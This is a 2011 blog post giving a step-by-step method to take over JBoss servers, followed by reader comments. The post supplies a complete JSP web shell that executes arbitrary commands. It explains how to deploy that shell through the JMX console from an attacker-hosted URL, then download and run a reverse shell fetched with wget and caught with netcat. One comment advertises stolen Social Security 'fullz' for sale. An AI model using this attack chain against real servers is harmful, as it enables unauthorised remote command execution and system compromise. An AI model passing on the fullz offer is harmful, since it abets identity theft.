Saturday, 19 February 2011

How to hack ANY version of JBOSS



Hi everyone, in this post I will explain how to hack ANY version of JBOSS and get root to the target machine.
1) Browse the target machine : http://mytargettest.com:8080
2) Click on the JMX-CONSOLE, if you can see the page, that's great.
3) Now you need to create a war file with our shell.

3.1) mkdir WEB-INF
3.2)vi cmd.jsp and insert this:
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>

3.3)vi WEB-INF/web.xml  and insert this:
<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
version="2.4">
<servlet>
<servlet-name>Command</servlet-name>
<jsp-file>/cmd.jsp</jsp-file>
</servlet>
</web-app>

3.4) now you have to compile it :  jar cvf cmd.war WEB-INF cmd.jsp
3.5) Move this file to your pentest webserver, you will need to download this file to the target machine.
4) Now browse http://mytargettest.com:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL
5) Search for "void addURL()"
6) Insert the address for your war file , in my case  :  http://172.16.1.79/exploits/cmd.war  and click INVOKE
7) It will take about 1min , then you can browse your application http://mytargettest.com:8080/cmd/cmd.jsp
8) Now you just need to type the commands like.. "id" , if you are not root, then you need to find a exploit to root the machine
9) Meanwhile you can get shell to the machine doing this
10) Download to the machine a reverse shell  : wget -P /tmp http://172.16.1.79/exploits/airwolf_reverse_shell
11) chmod +x /tmp/airwolf_reverse_shell
12) prepare your pentest machine to get the reverse shell :  nc -l -p 8080 -vvv
13) Run the reverse shell on the target machine  : /tmp/airwolf_reverse_shell
14) you are now connected to the server.

Thanks for watching.
Posted by at

10 comments:

  1. Gilberto Mattiello4 October 2011 at 07:42

    This comment has been removed by the author.

    ReplyDelete
  2. Gilberto Mattiello4 October 2011 at 07:57

    excellent article
    I'm trying to compile the files but I can not, you could send the file in mai email?

    cmd.war??

    ReplyDelete
  3. Angelo7 October 2011 at 07:26

    Hello, please post here the error that you are getting, maybe others are facing the same problem, then I can help you and others at the same time.

    Thanks for the comment.

    ReplyDelete
  4. BrujodeOZ8 October 2011 at 11:28

    nice work!!
    it had remember me this attack http://www.youtube.com/watch?v=yghiC_U2RaM
    includes it, elevation privilege and reverse shell XD

    regards..

    ReplyDelete
  5. fanatico25 September 2012 at 09:40

    HI!,
    I was trying to do this.
    I compiled with no problems the WAR, I AddURL with the URL, and it says
    Operation completed successfully without a return value!
    But then I go to the URL and
    HTTP Status 404 - /cmd/cmd.jsp
    type Status report
    message /cmd/cmd.jsp
    description The requested resource (/cmd/cmd.jsp) is not available.


    What am I doing wrong?

    ReplyDelete
  6. Unknown24 December 2015 at 22:18

    airwolf_reverse_shell ??
    payload ??
    and another required files ??
    can you mail me ??

    ReplyDelete
  7. Unknown29 April 2016 at 03:51

    I surprise how much effort you put to create such a great informative websitemagazine

    ReplyDelete
  8. Unknown2 March 2018 at 21:25

    locate zecmd

    ReplyDelete
  9. No Name22 August 2020 at 16:21

    Hello Everyone !

    USA SSN Leads/Fullz available, along with Driving License/ID Number with good connectivity.

    All SSN's are Tested & Verified.

    **DETAILS IN LEADS/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL
    ->EMPLOYEE DETAILS

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If you buy in bulk, will give you discount
    *Sampling is just for serious buyers

    ->Hope for the long term business
    ->You can buy for your specific states too

    **Contact 24/7**

    Whatsapp > +923172721122

    Email > leads.sellers1212@gmail.com

    Telegram > @leadsupplier

    ICQ > 752822040

    ReplyDelete
  10. Amyloid13 September 2020 at 05:48

    I need to find deleted and erased files on my phone from February 1 to April 20 of 2020

    ReplyDelete

Subscribe to: Post Comments (Atom)